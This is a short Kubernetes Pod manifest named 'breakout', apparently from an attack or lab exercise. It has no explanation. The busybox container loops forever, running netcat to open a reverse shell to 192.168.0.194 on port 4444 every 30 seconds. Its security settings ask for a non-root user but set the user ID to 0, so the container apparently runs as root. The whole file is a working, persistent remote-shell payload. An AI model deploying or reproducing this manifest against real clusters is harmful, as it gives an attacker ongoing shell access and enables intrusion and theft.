apiVersion: v1
kind: Pod
metadata:
  name: breakout
  labels:
    app: breakout
spec:
  restartPolicy: Always
  containers:
  - name: breakout
    image: busybox
    command: ["sh", "-c"]
    args:
    - "while true; do sleep 30 && nc 192.168.0.194 4444 -e /bin/sh; done"
    securityContext:
      runAsNonRoot: true
      runAsUser: 0